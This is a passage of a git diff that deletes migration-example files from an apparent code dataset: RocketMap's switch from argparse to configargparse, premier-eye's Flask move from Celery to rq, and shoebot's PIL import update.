file.chunks(): - write.write(chunk) - write.close() - - def create_thumbnail(path, save, width, height): - # create a thumbnail of the file - img = Image.open(path) - - # resize the image for a thumbnail - scalex = width / img.size[0] - scaley = height / img.size[1] - scale = scalex if scalex > scaley else scaley - img = img.resize((int(img.size[0] * scale), - int(img.size[1] * scale)), - Image.ANTIALIAS) - - # crop the image to fit - if img.size[0] > width or img.size[1] > height: - left = (img.size[0] - width) / 2 - right = left + width - top = (img.size[1] - height) / 2 - bottom = top + height - img = img.crop((int(left), int(top), int(right), int(bottom))) - - # save the thumbnail - save_path = os.path.join(SCREENSHOT_PATH, save.format(str(screen.id))) - img.save(save_path, "PNG") - - create_thumbnail(path, "{0}_t.png", SCREENSHOT_WIDTH, SCREENSHOT_HEIGHT) - create_thumbnail(path, "{0}_mp.png", MAIN_PAGE_WIDTH, MAIN_PAGE_HEIGHT) - - return screen - diff --git a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff b/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff deleted file mode 100644 index e6021c7..0000000 --- a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff +++ /dev/null @@ -1,170 +0,0 @@ -diff --git a/pogom/utils.py b/pogom/utils.py - index dd1b7e1d31fa13e6a5d565b9ebdc9e9592dd709c..2960ec68f85274c37068e2577f28c44eecc4ff26 100644 - --- a/pogom/utils.py - +++ b/pogom/utils.py -@@ -3,23 +3,18 @@ - - import sys - import getpass --import argparse -+import configargparse - import re - import uuid - import os - import json - from datetime import datetime, timedelta --import ConfigParser - import platform - import logging - import 
shutil - - from . import config - --from exceptions import APIKeyException -- --DEFAULT_THREADS = 1 -- - logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s') - log = logging.getLogger(__name__) - -@@ -33,90 +28,56 @@ def verify_config_file_exists(filename): - log.info("Could not find " + filename + ", copying default") - shutil.copy2(fullpath + '.example', fullpath) - --def parse_config(args): -- verify_config_file_exists('../config/config.ini') -- Config = ConfigParser.ConfigParser() -- Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) -- args.auth_service = Config.get('Authentication', 'Service') -- args.username = Config.get('Authentication', 'Username') -- args.password = Config.get('Authentication', 'Password') -- args.location = Config.get('Search_Settings', 'Location') -- args.step_limit = int(Config.get('Search_Settings', 'Steps')) -- args.scan_delay = int(Config.get('Search_Settings', 'Scan_delay')) -- args.no_pokemon = Config.getboolean('Search_Settings', 'Disable_Pokemon') -- args.no_pokestops = Config.getboolean('Search_Settings', 'Disable_Pokestops') -- args.no_gyms = Config.getboolean('Search_Settings', 'Disable_Gyms') -- if Config.get('Misc', 'Google_Maps_API_Key') : -- args.gmaps_key = Config.get('Misc', 'Google_Maps_API_Key') -- args.host = Config.get('Misc', 'Host') -- args.port = Config.get('Misc', 'Port') -- -- return args -- --def parse_db_config(args): -- verify_config_file_exists('../config/config.ini') -- Config = ConfigParser.ConfigParser() -- Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) -- args.db_type = Config.get('Database','Type') -- args.db_name = Config.get('Database', 'Database_Name') -- args.db_user = Config.get('Database', 'Database_User') -- args.db_pass = Config.get('Database', 'Database_Pass') -- args.db_host = Config.get('Database', 'Database_Host') -- -- return args -- - def get_args(): - # fuck PEP8 -- parser = argparse.ArgumentParser() -- parser.add_argument('-se', '--settings',action='store_true',default=False) -+ parser = configargparse.ArgParser(default_config_files=['config/config.ini']) - parser.add_argument('-a', '--auth-service', type=str.lower, help='Auth Service', default='ptc') -- parser.add_argument('-u', '--username', help='Username', required=False) -- parser.add_argument('-p', '--password', help='Password', required=False) -- parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates', required=False) -- parser.add_argument('-st', '--step-limit', help='Steps', required=False, type=int) -- parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', required=False, type=int, default=1) -- parser.add_argument('-dc','--display-in-console',help='Display Found Pokemon in Console',action='store_true',default=False) -+ parser.add_argument('-u', '--username', help='Username') -+ parser.add_argument('-p', '--password', help='Password') -+ parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates') -+ parser.add_argument('-st', '--step-limit', help='Steps', type=int, default=12) -+ parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', type=int, default=1) -+ parser.add_argument('-dc', '--display-in-console',help='Display Found Pokemon in Console',action='store_true', default=False) - parser.add_argument('-H', '--host', help='Set web server listening host', default='127.0.0.1') 
- parser.add_argument('-P', '--port', type=int, help='Set web server listening port', default=5000) -- parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check' -- 'locale folder for more options', default='en') -+ parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check locale folder for more options', default='en') - parser.add_argument('-c', '--china', help='Coordinates transformer for China', action='store_true') - parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true') - parser.add_argument('-m', '--mock', help='Mock mode. Starts the web server but not the background thread.', action='store_true', default=False) -- parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False, dest='no_server') -- parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False, dest='only_server') -- parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False, dest='fixed_location') -- parser.add_argument('-k', '--google-maps-key', help='Google Maps Javascript API Key', default=None, dest='gmaps_key') -+ parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False) -+ parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False) -+ parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False) -+ parser.add_argument('-k', '--gmaps-key', help='Google Maps Javascript API Key', required=True) - parser.add_argument('-C', '--cors', help='Enable CORS on web server', action='store_true', default=False) - parser.add_argument('-D', '--db', help='Database filename', default='pogom.db') -- parser.add_argument('-t', '--threads', help='Number of search threads', required=False, type=int, default=DEFAULT_THREADS, dest='num_threads') -+ parser.add_argument('-t', '--num-threads', help='Number of search threads', type=int, default=1) - parser.add_argument('-np', '--no-pokemon', help='Disables Pokemon from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-ng', '--no-gyms', help='Disables Gyms from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-nk', '--no-pokestops', help='Disables PokeStops from the map (including parsing them into local db)', action='store_true', default=False) -+ parser.add_argument('--db-type', help='Type of database to be used (default: sqlite)', default='sqlite') -+ parser.add_argument('--db-name', help='Name of the database to be used') -+ parser.add_argument('--db-user', help='Username for the database') -+ parser.add_argument('--db-pass', help='Password for the database') -+ parser.add_argument('--db-host', help='IP or hostname for the database') - parser.set_defaults(DEBUG=False) -- args = parser.parse_args() - -- args = parse_db_config(args) -+ args = parser.parse_args() - -- if (args.settings): -- args = parse_config(args) -+ if args.only_server: -+ if args.location is None: -+ parser.print_usage() -+ print sys.argv[0] + ': error: arguments -l/--location is required' -+ sys.exit(1); - else: -- if 
args.only_server: -- if args.location is None: -- parser.print_usage() -- print sys.argv[0] + ': error: arguments -l/--location is required' -- sys.exit(1); -- else: -- if (args.username is None or args.location is None or args.step_limit is None): -- parser.print_usage() -- print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' -- sys.exit(1); -- -- if config["PASSWORD"] is None and args.password is None: -- config["PASSWORD"] = args.password = getpass.getpass() -- elif args.password is None: -- args.password = config["PASSWORD"] -+ if (args.username is None or args.location is None or args.step_limit is None): -+ parser.print_usage() -+ print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' -+ sys.exit(1); - -+ if config["PASSWORD"] is None and args.password is None: -+ config["PASSWORD"] = args.password = getpass.getpass() -+ elif args.password is None: -+ args.password = config["PASSWORD"] - - return args - -@@ -178,17 +139,3 @@ def get_pokemon_name(pokemon_id): - get_pokemon_name.names = json.loads(f.read()) - - return get_pokemon_name.names[str(pokemon_id)] -- --def load_credentials(filepath): -- verify_config_file_exists('../config/credentials.json') -- try: -- with open(filepath+os.path.sep+'/config/credentials.json') as file: -- creds = json.load(file) -- except IOError: -- creds = {} -- if not creds.get('gmaps_key'): -- raise APIKeyException(\ -- "No Google Maps Javascript API key entered in \config\credentials.json file!" -- " Please take a look at the wiki for instructions on how to generate this key," -- " then add that key to the file!") -- return creds diff --git a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py b/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py deleted file mode 100644 index f17c029..0000000 --- a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py +++ /dev/null @@ -1,194 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- - -import sys -import getpass -import argparse -import re -import uuid -import os -import json -from datetime import datetime, timedelta -import ConfigParser -import platform -import logging -import shutil - -from . 
import config - -from exceptions import APIKeyException - -DEFAULT_THREADS = 1 - -logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s') -log = logging.getLogger(__name__) - -def parse_unicode(bytestring): - decoded_string = bytestring.decode(sys.getfilesystemencoding()) - return decoded_string - -def verify_config_file_exists(filename): - fullpath = os.path.join(os.path.dirname(__file__), filename) - if os.path.exists(fullpath) is False: - log.info("Could not find " + filename + ", copying default") - shutil.copy2(fullpath + '.example', fullpath) - -def parse_config(args): - verify_config_file_exists('../config/config.ini') - Config = ConfigParser.ConfigParser() - Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) - args.auth_service = Config.get('Authentication', 'Service') - args.username = Config.get('Authentication', 'Username') - args.password = Config.get('Authentication', 'Password') - args.location = Config.get('Search_Settings', 'Location') - args.step_limit = int(Config.get('Search_Settings', 'Steps')) - args.scan_delay = int(Config.get('Search_Settings', 'Scan_delay')) - args.no_pokemon = Config.getboolean('Search_Settings', 'Disable_Pokemon') - args.no_pokestops = Config.getboolean('Search_Settings', 'Disable_Pokestops') - args.no_gyms = Config.getboolean('Search_Settings', 'Disable_Gyms') - if Config.get('Misc', 'Google_Maps_API_Key') : - args.gmaps_key = Config.get('Misc', 'Google_Maps_API_Key') - args.host = Config.get('Misc', 'Host') - args.port = Config.get('Misc', 'Port') - - return args - -def parse_db_config(args): - verify_config_file_exists('../config/config.ini') - Config = ConfigParser.ConfigParser() - Config.read(os.path.join(os.path.dirname(__file__), '../config/config.ini')) - args.db_type = Config.get('Database','Type') - args.db_name = Config.get('Database', 'Database_Name') - args.db_user = Config.get('Database', 'Database_User') - args.db_pass = Config.get('Database', 'Database_Pass') - args.db_host = Config.get('Database', 'Database_Host') - - return args - -def get_args(): - # fuck PEP8 - parser = argparse.ArgumentParser() - parser.add_argument('-se', '--settings',action='store_true',default=False) - parser.add_argument('-a', '--auth-service', type=str.lower, help='Auth Service', default='ptc') - parser.add_argument('-u', '--username', help='Username', required=False) - parser.add_argument('-p', '--password', help='Password', required=False) - parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates', required=False) - parser.add_argument('-st', '--step-limit', help='Steps', required=False, type=int) - parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', required=False, type=int, default=1) - parser.add_argument('-dc','--display-in-console',help='Display Found Pokemon in Console',action='store_true',default=False) - parser.add_argument('-H', '--host', help='Set web server listening host', default='127.0.0.1') - parser.add_argument('-P', '--port', type=int, help='Set web server listening port', default=5000) - parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check' - 'locale folder for more options', default='en') - parser.add_argument('-c', '--china', help='Coordinates transformer for China', action='store_true') - parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true') - parser.add_argument('-m', '--mock', help='Mock mode. 
Starts the web server but not the background thread.', action='store_true', default=False) - parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False, dest='no_server') - parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False, dest='only_server') - parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False, dest='fixed_location') - parser.add_argument('-k', '--google-maps-key', help='Google Maps Javascript API Key', default=None, dest='gmaps_key') - parser.add_argument('-C', '--cors', help='Enable CORS on web server', action='store_true', default=False) - parser.add_argument('-D', '--db', help='Database filename', default='pogom.db') - parser.add_argument('-t', '--threads', help='Number of search threads', required=False, type=int, default=DEFAULT_THREADS, dest='num_threads') - parser.add_argument('-np', '--no-pokemon', help='Disables Pokemon from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-ng', '--no-gyms', help='Disables Gyms from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-nk', '--no-pokestops', help='Disables PokeStops from the map (including parsing them into local db)', action='store_true', default=False) - parser.set_defaults(DEBUG=False) - args = parser.parse_args() - - args = parse_db_config(args) - - if (args.settings): - args = parse_config(args) - else: - if args.only_server: - if args.location is None: - parser.print_usage() - print sys.argv[0] + ': error: arguments -l/--location is required' - sys.exit(1); - else: - if (args.username is None or args.location is None or args.step_limit is None): - parser.print_usage() - print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' - sys.exit(1); - - if config["PASSWORD"] is None and args.password is None: - config["PASSWORD"] = args.password = getpass.getpass() - elif args.password is None: - args.password = config["PASSWORD"] - - - return args - -def insert_mock_data(): - num_pokemon = 6 - num_pokestop = 6 - num_gym = 6 - - from .models import Pokemon, Pokestop, Gym - from .search import generate_location_steps - - latitude, longitude = float(config['ORIGINAL_LATITUDE']), float(config['ORIGINAL_LONGITUDE']) - - locations = [l for l in generate_location_steps((latitude, longitude), num_pokemon)] - disappear_time = datetime.now() + timedelta(hours=1) - - detect_time = datetime.now() - - for i in xrange(num_pokemon): - Pokemon.create(encounter_id=uuid.uuid4(), - spawnpoint_id='sp{}'.format(i), - pokemon_id=(i+1) % 150, - latitude=locations[i][0], - longitude=locations[i][1], - disappear_time=disappear_time, - detect_time=detect_time) - - for i in range(num_pokestop): - - Pokestop.create(pokestop_id=uuid.uuid4(), - enabled=True, - latitude=locations[i+num_pokemon][0], - longitude=locations[i+num_pokemon][1], - last_modified=datetime.now(), - #Every other pokestop be lured - lure_expiration=disappear_time if (i % 2 == 0) else None, - active_pokemon_id=i - ) - - for i in range(num_gym): - Gym.create(gym_id=uuid.uuid4(), - team_id=i % 3, - guard_pokemon_id=(i+1) % 150, - latitude=locations[i + num_pokemon + num_pokestop][0], - longitude=locations[i + num_pokemon + num_pokestop][1], - 
last_modified=datetime.now(), - enabled=True, - gym_points=1000 - ) - -def get_pokemon_name(pokemon_id): - if not hasattr(get_pokemon_name, 'names'): - file_path = os.path.join( - config['ROOT_PATH'], - config['LOCALES_DIR'], - 'pokemon.{}.json'.format(config['LOCALE'])) - - with open(file_path, 'r') as f: - get_pokemon_name.names = json.loads(f.read()) - - return get_pokemon_name.names[str(pokemon_id)] - -def load_credentials(filepath): - verify_config_file_exists('../config/credentials.json') - try: - with open(filepath+os.path.sep+'/config/credentials.json') as file: - creds = json.load(file) - except IOError: - creds = {} - if not creds.get('gmaps_key'): - raise APIKeyException(\ - "No Google Maps Javascript API key entered in \config\credentials.json file!" - " Please take a look at the wiki for instructions on how to generate this key," - " then add that key to the file!") - return creds diff --git a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py b/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py deleted file mode 100644 index bd53c24..0000000 --- a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- - -import sys -import getpass -import configargparse -import re -import uuid -import os -import json -from datetime import datetime, timedelta -import platform -import logging -import shutil - -from . import config - -logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s') -log = logging.getLogger(__name__) - -def parse_unicode(bytestring): - decoded_string = bytestring.decode(sys.getfilesystemencoding()) - return decoded_string - -def verify_config_file_exists(filename): - fullpath = os.path.join(os.path.dirname(__file__), filename) - if os.path.exists(fullpath) is False: - log.info("Could not find " + filename + ", copying default") - shutil.copy2(fullpath + '.example', fullpath) - -def get_args(): - # fuck PEP8 - parser = configargparse.ArgParser(default_config_files=['config/config.ini']) - parser.add_argument('-a', '--auth-service', type=str.lower, help='Auth Service', default='ptc') - parser.add_argument('-u', '--username', help='Username') - parser.add_argument('-p', '--password', help='Password') - parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates') - parser.add_argument('-st', '--step-limit', help='Steps', type=int, default=12) - parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', type=int, default=1) - parser.add_argument('-dc', '--display-in-console',help='Display Found Pokemon in Console',action='store_true', default=False) - parser.add_argument('-H', '--host', help='Set web server listening host', default='127.0.0.1') - parser.add_argument('-P', '--port', type=int, help='Set web server listening port', default=5000) - parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check locale folder for more options', default='en') - parser.add_argument('-c', '--china', help='Coordinates transformer for China', action='store_true') - parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true') - parser.add_argument('-m', '--mock', help='Mock mode. Starts the web server but not the background thread.', action='store_true', default=False) - parser.add_argument('-ns', '--no-server', help='No-Server Mode. 
Starts the searcher but not the Webserver.', action='store_true', default=False) - parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False) - parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False) - parser.add_argument('-k', '--gmaps-key', help='Google Maps Javascript API Key', required=True) - parser.add_argument('-C', '--cors', help='Enable CORS on web server', action='store_true', default=False) - parser.add_argument('-D', '--db', help='Database filename', default='pogom.db') - parser.add_argument('-t', '--num-threads', help='Number of search threads', type=int, default=1) - parser.add_argument('-np', '--no-pokemon', help='Disables Pokemon from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-ng', '--no-gyms', help='Disables Gyms from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-nk', '--no-pokestops', help='Disables PokeStops from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('--db-type', help='Type of database to be used (default: sqlite)', default='sqlite') - parser.add_argument('--db-name', help='Name of the database to be used') - parser.add_argument('--db-user', help='Username for the database') - parser.add_argument('--db-pass', help='Password for the database') - parser.add_argument('--db-host', help='IP or hostname for the database') - parser.set_defaults(DEBUG=False) - - args = parser.parse_args() - - if args.only_server: - if args.location is None: - parser.print_usage() - print sys.argv[0] + ': error: arguments -l/--location is required' - sys.exit(1); - else: - if (args.username is None or args.location is None or args.step_limit is None): - parser.print_usage() - print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' - sys.exit(1); - - if config["PASSWORD"] is None and args.password is None: - config["PASSWORD"] = args.password = getpass.getpass() - elif args.password is None: - args.password = config["PASSWORD"] - - return args - -def insert_mock_data(): - num_pokemon = 6 - num_pokestop = 6 - num_gym = 6 - - from .models import Pokemon, Pokestop, Gym - from .search import generate_location_steps - - latitude, longitude = float(config['ORIGINAL_LATITUDE']), float(config['ORIGINAL_LONGITUDE']) - - locations = [l for l in generate_location_steps((latitude, longitude), num_pokemon)] - disappear_time = datetime.now() + timedelta(hours=1) - - detect_time = datetime.now() - - for i in xrange(num_pokemon): - Pokemon.create(encounter_id=uuid.uuid4(), - spawnpoint_id='sp{}'.format(i), - pokemon_id=(i+1) % 150, - latitude=locations[i][0], - longitude=locations[i][1], - disappear_time=disappear_time, - detect_time=detect_time) - - for i in range(num_pokestop): - - Pokestop.create(pokestop_id=uuid.uuid4(), - enabled=True, - latitude=locations[i+num_pokemon][0], - longitude=locations[i+num_pokemon][1], - last_modified=datetime.now(), - #Every other pokestop be lured - lure_expiration=disappear_time if (i % 2 == 0) else None, - active_pokemon_id=i - ) - - for i in range(num_gym): - Gym.create(gym_id=uuid.uuid4(), - team_id=i % 3, - guard_pokemon_id=(i+1) % 150, - latitude=locations[i + num_pokemon + num_pokestop][0], - longitude=locations[i + num_pokemon + num_pokestop][1], - 
last_modified=datetime.now(), - enabled=True, - gym_points=1000 - ) - -def get_pokemon_name(pokemon_id): - if not hasattr(get_pokemon_name, 'names'): - file_path = os.path.join( - config['ROOT_PATH'], - config['LOCALES_DIR'], - 'pokemon.{}.json'.format(config['LOCALE'])) - - with open(file_path, 'r') as f: - get_pokemon_name.names = json.loads(f.read()) - - return get_pokemon_name.names[str(pokemon_id)] diff --git a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff b/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff deleted file mode 100644 index 170af99..0000000 --- a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/pyfront/app/__init__.py b/pyfront/app/__init__.py - index 4fbdcfced750d60cb3587fb81add23e8b34eb777..a7375ccc40885f04faf4a05852591e6de4ba676d 100644 - --- a/pyfront/app/__init__.py - +++ b/pyfront/app/__init__.py -@@ -1,17 +1,23 @@ - from flask import Flask --from celery import Celery --from pathlib import Path --import sys --import os -+from redis import Redis -+import rq -+from config import Config - --app = Flask(__name__, template_folder="views") - --queue = Celery('tasks', backend='amqp', broker='ampq://') -- --@queue.task - def runDetecting(): - import services.docker_handlers as dc - dc.runDockerContainer("sapfir0/premier-eye") - - --from app import routes -\ No newline at end of file -+def createApp(configClass=Config): -+ app = Flask(__name__, template_folder="views") # это экспортируем -+ print(app.config) -+ app.config.from_object(configClass) -+ -+ from app.errors import bp as errorsBP -+ app.register_blueprint(errorsBP) -+ -+ from app.main import bp as mainBP -+ app.register_blueprint(mainBP) -+ return app -+ diff --git a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py b/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py deleted file mode 100644 index b0677e3..0000000 --- a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py +++ /dev/null @@ -1,17 +0,0 @@ -from flask import Flask -from celery import Celery -from pathlib import Path -import sys -import os - -app = Flask(__name__, template_folder="views") - -queue = Celery('tasks', backend='amqp', broker='ampq://') - -@queue.task -def runDetecting(): - import services.docker_handlers as dc - dc.runDockerContainer("sapfir0/premier-eye") - - -from app import routes \ No newline at end of file diff --git a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py b/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py deleted file mode 100644 index 54920c1..0000000 --- a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py +++ /dev/null @@ -1,23 +0,0 @@ -from flask import Flask -from redis import Redis -import rq -from config import Config - - -def runDetecting(): - import services.docker_handlers as dc - dc.runDockerContainer("sapfir0/premier-eye") - - -def createApp(configClass=Config): - app = Flask(__name__, template_folder="views") # это экспортируем - print(app.config) - app.config.from_object(configClass) - - from app.errors import bp as errorsBP - app.register_blueprint(errorsBP) - - from app.main import bp as mainBP - app.register_blueprint(mainBP) - return app - diff --git a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff b/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff deleted 
file mode 100644 index 5c95235..0000000 --- a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/shoebot/data/img.py b/shoebot/data/img.py - index 478ec15034ec6954cec0da6639ded9e3010f2eb7..0171fb9ff6ed2fed71dcfe82eef7ca723d609fcf 100644 - --- a/shoebot/data/img.py - +++ b/shoebot/data/img.py -@@ -6,7 +6,7 @@ import os.path - from sys import platform - - import cairo --import Image as PILImage -+from PIL import Image as PILImage - import gtk - - if platform != 'darwin': diff --git a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py b/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py deleted file mode 100644 index 0ffc8d9..0000000 --- a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py +++ /dev/null @@ -1,138 +0,0 @@ -from shoebot.data import _copy_attrs - -import array -from StringIO import StringIO -import os.path -from sys import platform - -import cairo -import Image as PILImage -import gtk - -if platform != 'darwin': - import rsvg - -from shoebot.data import Grob, ColorMixin -from shoebot.util import RecordingSurface - -CENTER = 'center' -CORNER = 'corner' - -class Image(Grob, ColorMixin): - _surface_cache = {} # {filename: width, height, imagesurface} - - def __init__(self, bot, path = None, x = 0, y = 0, width=None, height=None, alpha=1.0, data=None, pathmode=CORNER, **kwargs): - Grob.__init__(self, bot) - ColorMixin.__init__(self, **kwargs) - - self.x = x - self.y = y - self.width = width - self.height = height - self.alpha = alpha - self.path = path - self.data = data - self._pathmode = pathmode - sh = sw = None # Surface Height and Width - - if isinstance(self.data, cairo.ImageSurface): - sw = self.data.get_width() - sh = self.data.get_height() - self._imagesurface = self.data - else: - # checks if image data is passed in command call, in this case it wraps - # the data in a StringIO oject in order to use it as a file - # the data itself must contain an entire image, not just pixel data - # it can be useful for example to retrieve images from the web without - # writing temp files (e.g. 
using nodebox's web library, see example 1 of the library) - # if no data is passed the path is used to open a local file - if self.data is None: - if path in self._surface_cache: - sw, sh, imagesurface = self._surface_cache[path] - elif os.path.splitext(path)[1].lower() == '.svg': - handle = rsvg.Handle(path) - sw, sh = handle.get_dimension_data()[:2] - imagesurface = RecordingSurface(sw, sh) - ctx = cairo.Context(imagesurface) - handle.render_cairo(ctx) - elif os.path.splitext(path)[1].lower() == '.png': - imagesurface = cairo.ImageSurface.create_from_png(path) - sw = imagesurface.get_width() - sh = imagesurface.get_height() - else: - pixbuf = gtk.gdk.pixbuf_new_from_file(path) - sw = pixbuf.get_width() - sh = pixbuf.get_height() - - ''' create a new cairo surface to place the image on ''' - surface = cairo.ImageSurface(0, sw, sh) - ''' create a context to the new surface ''' - ct = cairo.Context(surface) - ''' create a GDK formatted Cairo context to the new Cairo native context ''' - ct2 = gtk.gdk.CairoContext(ct) - ''' draw from the pixbuf to the new surface ''' - ct2.set_source_pixbuf(pixbuf, 0, 0) - ct2.paint() - ''' surface now contains the image in a Cairo surface ''' - imagesurface = ct2.get_target() - self._surface_cache[path] = sw, sh, imagesurface - else: - img = PILImage.open(StringIO(self.data)) - - if img.mode != 'RGBA': - img = img.convert("RGBA") - - sw, sh = img.size - # Would be nice to not have to do some of these conversions :-\ - bgra_data = img.tostring('raw', 'BGRA', 0, 1) - bgra_array = array.array('B', bgra_data) - imagesurface = cairo.ImageSurface.create_for_data(bgra_array, cairo.FORMAT_ARGB32, sw, sh, sw*4) - - if width is not None or height is not None: - if width: - wscale = float(width) / sw - else: - wscale = 1.0 - if height: - hscale = float(height) / sh - else: - if width: - hscale = wscale - else: - hscale = 1.0 - self._transform.scale(wscale, hscale) - - self.width = width or sw - self.height = height or sh - self._imagesurface = imagesurface - - self._deferred_render() - - - def _render(self, ctx): - if self.width and self.height: - # Go to initial point (CORNER or CENTER): - transform = self._call_transform_mode(self._transform) - - ctx.set_matrix(self._transform) - ctx.translate(self.x, self.y) - ctx.set_source_surface(self._imagesurface) - ctx.paint() - - def draw(self): - self._deferred_render() - - def _get_center(self): - '''Returns the center point of the path, disregarding transforms. 
-        '''
-        x = (self.x+self.width/2)
-        y = (self.y+self.height/2)
-        return (x,y)
-    center = property(_get_center)
-
-    def copy(self):
-        p = self.__class__(self._bot, self.path, self.x, self.y, self.width, self.height)
-        _copy_attrs(self._bot, p, self.stateAttributes)
-        return p
-
-
diff --git a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py b/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py
deleted file mode 100644
index 103c478..0000000
--- a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py
+++ /dev/null
@@ -1,138 +0,0 @@
-from shoebot.data import _copy_attrs
-
-import array
-from StringIO import StringIO
-import os.path
-from sys import platform
-
-import cairo
-from PIL import Image as PILImage
-import gtk
-
-if platform != 'darwin':
-    import rsvg
-
-from shoebot.data import Grob, ColorMixin
-from shoebot.util import RecordingSurface
-
-CENTER = 'center'
-CORNER = 'corner'
-
-class Image(Grob, ColorMixin):
-    _surface_cache = {} # {filename: width, height, imagesurface}
-
-    def __init__(self, bot, path = None, x = 0, y = 0, width=None, height=None, alpha=1.0, data=None, pathmode=CORNER, **kwargs):
-        Grob.__init__(self, bot)
-        ColorMixin.__init__(self, **kwargs)
-
-        self.x = x
-        self.y = y
-        self.width = width
-        self.height = height
-        self.alpha = alpha
-        self.path = path
-        self.data = data
-        self._pathmode = pathmode
-        sh = sw = None # Surface Height and Width
-
-        if isinstance(self.data, cairo.ImageSurface):
-            sw = self.data.get_width()
-            sh = self.data.get_height()
-            self._imagesurface = self.data
-        else:
-            # checks if image data is passed in command call, in this case it wraps
-            # the data in a StringIO oject in order to use it as a file
-            # the data itself must contain an entire image, not just pixel data
-            # it can be useful for example to retrieve images from the web without
-            # writing temp files (e.g. using nodebox's web library, see example 1 of the library)
-            # if no data is passed the path is used to open a local file
-            if self.data is None:
-                if path in self._surface_cache:
-                    sw, sh, imagesurface = self._surface_cache[path]
-                elif os.path.splitext(path)[1].lower() == '.svg':
-                    handle = rsvg.Handle(path)
